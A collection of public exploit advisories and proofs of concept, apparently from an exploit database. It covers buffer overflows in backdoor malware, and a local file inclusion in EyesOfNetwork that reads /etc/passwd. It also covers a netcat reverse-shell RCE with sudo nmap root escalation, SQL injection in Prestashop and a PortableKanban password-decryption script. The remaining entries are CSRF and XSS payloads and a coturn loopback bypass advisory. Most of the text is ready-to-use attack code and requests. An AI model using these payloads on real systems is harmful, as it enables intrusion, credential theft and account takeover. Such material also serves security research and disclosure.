EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  41414141

WRITE_ADDRESS:  41414141 

FOLLOWUP_IP: 
+cbf7340
41414141 ??              ???

FAILED_INSTRUCTION_ADDRESS: 
+cbf7340
41414141 ??              ???

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

IP_ON_HEAP:  41414141
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 41414141

CONTEXT:  0019f838 -- (.cxr 0x19f838)
eax=0040b77e ebx=0040513c ecx=cbc27c7e edx=0019fbcc esi=0000663e edi=00006642
eip=41414141 esp=0019fc98 ebp=0019fcbc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
41414141 ??              ???
Resetting default scope


Exploit/PoC:
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=1500
JUNK="A"*7740
JUNK2="A"*7822
PAYLOAD="TRACE / "+JUNK+"HTTP/1."+JUNK+"\r\n"+MALWARE_HOST+"\r\nCookie: "+JUNK2+"\r\n\r\n"

s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))
s.send(PAYLOAD)
s.close()

print("Backdoor.Win32.Levelone.a / Remote Stack Buffer Overflow")
print("MD5: 6a2d09c4527cf222e4e2571b074fcc0c")
print("By Malvuln")


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

# Exploit Title: EyesOfNetwork 5.3 - LFI
# Date: 10/01/2021
# Exploit Author: Audencia Business SCHOOL Red Team
# Vendor Homepage: https://www.eyesofnetwork.com/en
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3

The php not exclude other tools than proposed one. It's possible possible to include files when the parameter "tool_list=" is modified like that :

==================================================================
POST /module/tool_all/select_tool.php HTTP/1.1
Host: 192.168.0.26
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 209
Origin: https://192.168.0.26
Connection: close
Referer: https://192.168.0.26/module/tool_all/
Cookie: session_id=746751013; user_name=admin; user_id=1; user_limitation=0; group_id=1

(tool_list=FILE TO READ)
page=bylistbox&host_list=127.0.0.1&tool_list=/etc/passwd&snmp_com=aze&snmp_version=2c&min_port=1&max_port=1024&username=&password=&snmp_auth_protocol=MD5&snmp_priv_passphrase=&snmp_priv_protocol=&snmp_context=

==================================================================


Result a printed /etc/passwd document in the webpage : 

==================================================================

HTTP/1.1 200 OK 
Date: Sat, 09 Jan 2021 01:16:21 GMT 
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3 
X-Powered-By: PHP/5.4.16 
Content-Length: 1529 
Connection: close 
Content-Type: text/html; charset=UTF-8 

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nagios:x:999:991::/var/spool/nagios:/sbin/nologin
influxdb:x:998:998::/var/lib/influxdb:/bin/false
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
grafana:x:997:995:grafana user:/usr/share/grafana:/sbin/nologin
polkitd:x:996:994:User for polkitd:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
snmptt:x:995:992:SNMP Trap Translator:/var/spool/snmptt:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:994:990::/var/lib/chrony:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
cacti:x:1000:991::/home/cacti:/bin/bash
eon4apps:x:1001:991::/srv/eyesofnetwork/eon4apps:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
admin:x:1002:1000:admin:/home/admin:/bin/bash

==================================================================

# Exploit Title: PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval
# Date: 9 Jan 2021
# Exploit Author: rootabeta
# Vendor Homepage: The original page, https://dmitryivanov.net/, cannot be found at this time of writing. The vulnerable software can be downloaded from https://www.softpedia.com/get/Office-tools/Diary-Organizers-Calendar/Portable-Kanban.shtml
# Software Link: https://www.softpedia.com/get/Office-tools/Diary-Organizers-Calendar/Portable-Kanban.shtml
# Version: Tested on: 4.3.6578.38136. All versions that use the similar file format are likely vulnerable.
# Tested on: Windows 10 x64. Exploit likely works on all OSs that PBK runs on. 

# PortableKanBan stores credentials in an encrypted format
# Reverse engineering the executable allows an attacker to extract credentials from local storage
# Provide this program with the path to a valid PortableKanban.pk3 file and it will extract the decoded credentials

import json
import base64
from des import * #python3 -m pip install des
import sys

try:
  path = sys.argv[1]
except:
  exit("Supply path to PortableKanban.pk3 as argv1")

def decode(hash):
  hash = base64.b64decode(hash.encode('utf-8'))
  key = DesKey(b"7ly6UznJ")
  return key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8')

with open(path) as f:
  try:
    data = json.load(f)
  except: #Start of file sometimes contains junk - this automatically seeks valid JSON
    broken = True
    i = 1
    while broken:
      f.seek(i,0)
      try:
        data = json.load(f)
        broken = False
      except:
        i+= 1


for user in data["Users"]:
  print("{}:{}".format(user["Name"],decode(user["EncryptedPassword"])))

# Exploit Title: OpenCart 3.0.36 - ATO via Cross Site Request Forgery
# Date: 01-09-2021
# Exploit Author: Mahendra Purbia {Mah3Sec}
# Vendor Homepage: https://www.opencart.com
# Software Link: https://www.opencart.com/index.php?route=cms/download
# Version: OpenCart CMS - 3.0.3.6
# Tested on: Kali Linux

#Description:
OpenCart CMS 3.0.3.6 & below versions are vulnerable to Account takeover via CSRF, related to the endpoint /account/edit.

Steps to Reproduce:
1. create accounts a. victim & b. Attacker (attacker account is just for fetch the request and create a CSRf POC)
2. Now login with Attacker account and then go to account/edit and change the email and intercept this request in repeater, now create a CSRF POC of that request.
3. now in that poc change the email and email which is not registered {attacker another email}. Now save this request as a .html file.
4. now send this POC to the victim. and then the victim opens that file automatically all information is changed like name, email etc.
5. now attacker access account (with help of forgot password which came on attacker email) and fetch victim all information.

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/3f82e6ddc9f5242f5af200d2fbae4ce4.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Levelone.b
Vulnerability: Remote Stack Buffer Overflow 
Description: The backdoor listens on Port 7777, sending two large consecutive HTTP OPTIONS requests trigger the buffer overflow overwriting EIP.
Type: PE32
MD5: 3f82e6ddc9f5242f5af200d2fbae4ce4
Vuln ID: MVID-2021-0021
Dropped files: Vector64.exe
Network Access: Remote
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 01/10/2021

Memory Dump:
This dump file has an exception of interest stored in it.
The stored exception information can be accessed via .ecxr.
(b9c.1424): Access violation - code c0000005 (first/second chance not available)
eax=000a13a4 ebx=0019ff70 ecx=0040109a edx=773e9d70 esi=ffffffff edi=0040801c
eip=41414141 esp=000a1388 ebp=000a13ac iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
41414141 ??              ???

FAULTING_IP: 
+d0cf3c0
41414141 ??              ???

EXCEPTION_RECORD:  0019f7f0 -- (.exr 0x19f7f0)
ExceptionAddress: 41414141
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 41414141
Attempt to read from address 41414141

PROCESS_NAME:  Vector64.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  41414141

WRITE_ADDRESS:  41414141 

FOLLOWUP_IP: 
+d0cf3c0
41414141 ??              ???

FAILED_INSTRUCTION_ADDRESS: 
+d0cf3c0
41414141 ??              ???

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

IP_ON_HEAP:  41414141
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 41414141

CONTEXT:  0019f840 -- (.cxr 0x19f840)
eax=0040a371 ebx=0040513c ecx=b3be0a93 edx=0019fbd4 esi=00005231 edi=00005235
eip=41414141 esp=0019fca0 ebp=0019fcc4 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
41414141 ??              ???
Resetting default scope

ADDITIONAL_DEBUG_TEXT:  Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]

LAST_CONTROL_TRANSFER:  from 00402a5b to 41414141

FAULTING_THREAD:  ffffffff

BUGCHECK_STR:  APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

STACK_TEXT:  
0019fca0 41414141 unknown!printable+0x0
0019fca4 00402a5b vector64+0x2a5b
0019fccc 00402452 vector64+0x2452
0019fd14 0040253b vector64+0x253b
0019ff34 00402961 vector64+0x2961
0019ff3c 00401222 vector64+0x1222
0019ff88 76e38654 kernel32!BaseThreadInitThunk+0x24
0019ff9c 773c4a77 ntdll!__RtlUserThreadStart+0x2f
0019ffe4 773c4a47 ntdll!_RtlUserThreadStart+0x1b


STACK_COMMAND:  .cxr 000000000019F840 ; kb ; dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; dds 19fca0 ; kb

POSSIBLE_INVALID_CONTROL_TRANSFER:  from 00402a56 to 00403800

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: hardware

IMAGE_NAME:  hardware

DEBUG_FLR_IMAGE_TIMESTAMP:  0

BUCKET_ID:  CPU_CALL_ERROR

FAILURE_BUCKET_ID:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_hardware!Unknown



Exploit/PoC:
from socket import *
import time

MALWARE_HOST="x.x.x.x"
PORT=7777
sz = 20000
c=1

def doit():
    global c, sz
    while True:
        s=socket(AF_INET, SOCK_STREAM)
        s.connect((MALWARE_HOST, PORT))
        s.settimeout(0.3)
        sz += 1000
        JUNK="A"*sz
        PAYLOAD="OPTIONS  /"+JUNK+" HTTP/1.0\r\nHost: "+MALWARE_HOST+"\r\n\r\n"
        s.send(PAYLOAD)
        print(sz)
        s.close()
        time.sleep(0.2)
        c+=1
        if c==3:
            print("Backdoor.Win32.Levelone.b / Remote Stack Buffer Overflow")
            print("MD5: 3f82e6ddc9f5242f5af200d2fbae4ce4")
            print("By Malvuln")
            break

if __name__=="__main__":
    doit()

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

# Exploit Title: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection
# Date: 08-01-2021
# Exploit Author: Jaimin Gondaliya
# Vendor Homepage: https://www.prestashop.com
# Software Link: https://www.prestashop.com/en/download
# Version: Prestashop CMS - 1.7.7.0
# Tested on: Windows 10

Parameter: id_product

Payload: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt)

Exploit:
http://localhost/shop//index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(5)))xoOt)

# Exploit Title: EyesOfNetwork 5.3 - RCE & PrivEsc
# Date: 10/01/2021
# Exploit Author: Audencia Business SCHOOL Red Team
# Vendor Homepage: https://www.eyesofnetwork.com/en
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3

#Authentified Romote Code Execution flaw > remote shell > PrivEsc
#
#An user with acces to "/autodiscover.php" can execute remote commande, get a reverse shell and root the targeted machine.

==============================================
Initial RCE

In the webpage : https://EyesOfNetwork_IP/lilac/autodiscovery.php

The "target" input is not controled. It's possible tu put any commands after an "&", RCE is possible with a simple netcat commande like : 

& nc -e /bin/sh <IP> <PORT>
==============================================
PrivEsc

The EyesOfNetwork apache user can run "nmap" with sudo privilege and with NOPASSWD attribut, so it's possible to become the root user when using classic PrivEsc methode :

echo 'os.execute("/bin/sh")'> /tmp/nmap.script
sudo nmap --script=/tmp/nmap.script

# Exploit Title: Anchor CMS 0.12.7 - 'markdown' Stored Cross-Site Scripting
# Date: 2021-10-01
# Exploit Author: Ramazan Mert GÖKTEN
# Vendor Homepage: anchorcms.com
# Vulnerable Software: https://github.com/anchorcms/anchor-cms/releases/download/0.12.7/anchor-cms-0.12.7-bundled.zip
# Affected Version: [ 0.12.7 ]
# Tested on: Windows 10

# Vulnerable Parameter Type: POST
# Vulnerable Parameter: markdown
# Attack Pattern: <script>prompt("RMG_XSS_PoC")</script>

# Description

Exploitation of vulnerability as shown below;

1-) Entering the Admin Panel ( vulnerableapplication.com/anchor/admin )
2-) Click Create a new post button at the Posts tab ( From "vulnerableapplication.com/anchor/admin/posts " to "vulnerableapplication.com/anchor/admin/posts/add " )
3-) Relevant payload (<script>prompt("RMG_XSS_PoC")</script>) which was defined above entering the markdown parameter then click "save" button
4-) Finally, turn back the home page then shown the triggered vulnerability

# Proof of Concepts:

Request;

POST /anchor/admin/posts/add HTTP/1.1
Host: vulnerableapplication.com
Connection: close
Content-Length: 234
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://vulnerableapplication.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://vulnerableapplication.com/anchor/admin/posts/add
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9
Cookie: anchorcms=eokq2ggm8mc4ulg2ii01a92a7d1jqvof7er085tqp9mvmdk2i3h1;
_ga=GA1.2.798164571.1610282526; _gid=GA1.2.1405266792.1610282526; _gat=1

token=uyBOhuKe5lRACERuFGu9CzEqUVe9b6LgfNLFWA6rJJOjG5BPUr2XxZzUV0pMXiQn&title=xss-poc-test&markdown=%3Cscript%3Eprompt(%22RMG_XSS_PoC%22)%3C%2Fscript%3E&slug=xss-poc-test&description=&status=published&category=8&css=&js=&autosave=false

Response;

HTTP/1.1 200 OK
Date: Sun, 10 Jan 2021 12:50:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
X-Robots-Tag: noindex,nofollow
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 105

{"id":"3","notification":"Your new article was
created","redirect":"\/anchor\/admin\/posts\/edit\/3"}

# Loopback access control bypass in coturn by using 0.0.0.0, [::1] or [::] as the peer address

- Fixed version: 4.5.2
- Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2021-01-coturn-access-control-bypass
- Coturn Security Advisory: https://github.com/coturn/coturn/security/advisories/GHSA-6g6j-r9rf-cm7p
- Other references:
    - CVE-2020-26262
    - https://www.rtcsec.com/post/2021/01/details-about-cve-2020-26262-bypass-of-coturns-default-access-control-protection/
- Tested vulnerable versions: 4.5.1.x
- Timeline:
    - Report date: 2020-11-20
    - Issue confirmed by coturn developers: 2020-11-23
    - Security patch provided by Enable Security: 2020-11-30
    - Refactoring by coturn developers: 2020-12-07 to 2020-12-10
    - Joint Enable Security and Coturn project advisory publication: 2021-01-11

## Description

By default coturn does not allow peers to connect and relay packets to loopback addresses in the range of `127.x.x.x`. However, it was observed that when sending a `CONNECT` request with the `XOR-PEER-ADDRESS` value of `0.0.0.0`, a successful response was received and subsequently, `CONNECTIONBIND` also received a successful response. Coturn then was able to relay packets to local network services.

Additionally, when coturn was listening on IPv6, which is the default setting, local services could also be reached by making use of either `[::1]` or `[::]` as the peer address.

## Impact

By using the address `0.0.0.0` as the peer address, a malicious user will be able to relay packets to the loopback interface, unless `--denied-peer-ip=0.0.0.0` (or similar) has been specified. Since the default configuration implies that loopback peers are not allowed, coturn administrators may choose to not set the `denied-peer-ip` setting. Similar implications apply to the IPv6 equivalent of `[::1]` and `[::]`.

## How we reproduced the issue

1. Run coturn using the following command:

       turnserver -v --user=username1:password1
1. Run our internal tool `stunner`, acting as a socks5 proxy which uses TURN.

       stunner turn peer proxy socks5 tcp://172.17.0.2:3478 \
           --local-bind 0.0.0.0:9999 -u username1:password1
1. Run a cURL command to connect to `127.0.0.1:80`.

       curl -x socks5h://127.0.0.1:9999 http://127.0.0.1
1. The following log was observed, confirming that `127.0.0.1` is being blocked:

       725: IPv4. tcp or tls connected to: 172.17.0.1:36504
       725: session 011000000000000001: realm <172.17.0.2> user <>: 
           incoming packet message processed, error 401: Unauthorized
       725: IPv4. Local relay addr: 172.17.0.2:51705
       725: session 011000000000000001: new, realm=<172.17.0.2>, username=<username1>, 
           lifetime=600
       725: session 011000000000000001: realm <172.17.0.2> user <username1>: 
           incoming packet ALLOCATE processed, success
       725: session 011000000000000001: realm <172.17.0.2> user <username1>: 
           incoming packet CONNECT processed, error 403: Forbidden IP
       725: session 011000000000000001: realm <172.17.0.2> user <username1>: 
           incoming packet message processed, error 403: Forbidden IP
1. Run a cURL command to connect to `0.0.0.0:80`.

       curl -x socks5h://127.0.0.1:9999 http://0.0.0.0
1. The following log was observed, confirming that the loopback protection has been bypassed:

       1010: IPv4. tcp or tls connected to: 172.17.0.1:37240
       1010: session 005000000000000001: realm <172.17.0.2> user <>: 
           incoming packet message processed, error 401: Unauthorized
       1010: IPv4. Local relay addr: 172.17.0.2:62504
       1010: session 005000000000000001: new, realm=<172.17.0.2>, 
           username=<username1>, lifetime=600
       1010: session 005000000000000001: realm <172.17.0.2> user <username1>: 
           incoming packet ALLOCATE processed, success
       1010: session 005000000000000001: realm <172.17.0.2> user <username1>: 
           incoming packet CONNECT processed, success
       1010: IPv4. tcp or tls connected to: 172.17.0.1:37242
       1010: session 000000000000000001: client socket to be closed in client handler
       1010: session 000000000000000001: usage: realm=<172.17.0.2>, username=<>
       1010: session 005000000000000001: realm <172.17.0.2> user <username1>: 
           incoming packet CONNECTION_BIND processed, success
       1010: session 000000000000000001: peer usage: realm=<172.17.0.2>
       1010: session 000000000000000001: closed (2nd stage), user <> 
           realm <172.17.0.2> origin <>, local 172.17.0.2:3478, 
           remote 172.17.0.1:37242, reason: general

The 5th step could be repeated with the URL of `http://[::1]` and `http://[::]` where one would also bypass the default protection against loopback connections.

## Solution and recommendations

We recommend upgrading coturn to the latest version, 4.5.2 which fixes this issue.

To mitigate this issue in previous versions, the addresses in the address block `0.0.0.0/8` should be denied by making use of the `denied-peer-ip` configuration setting. The following is an example configuration that prevents access to `0.0.0.0`:

```
denied-peer-ip=0.0.0.0-0.255.255.255
```

Additionally, as a mitigation step when the patch cannot yet be applied, we recommend disabling IPv6 if not required by listening on an IPv4 IP address. See our blog post for an [explanation][1] for this recommendation.

[1]: https://www.rtcsec.com/post/2021/01/details-about-cve-2020-26262-bypass-of-coturns-default-access-control-protection/#faq

Enable Security would like to thank Mészáros Mihály and the developers at Coturn for the very quick response and fixing this security issue.


## About Enable Security

[Enable Security](https://www.enablesecurity.com) develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack.

## Disclaimer

The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

## Disclosure policy

This report is subject to Enable Security's vulnerability disclosure policy which can be found at <https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy>.

# Exploit Title: WordPress Plugin Custom Global Variables 1.0.5 - 'name' Stored Cross-Site Scripting (XSS) 
# Google Dork: NA
# Date: 09/01/2021
# Exploit Author: Swapnil Subhash Bodekar
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/custom-global-variables/#developers
# Version: 1.0.5
# Tested on Windows

How to reproduce vulnerability:

1. Install WordPress 5.6
2. Install and activate Custom Global variables plugin.
3. Navigate to Setting >> Custom Global Variables and enter the data into the user input field.
4. Capture the request into burp suite and append the JavaScript payload which is mentioned below 
"><script>(1)</script><"
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.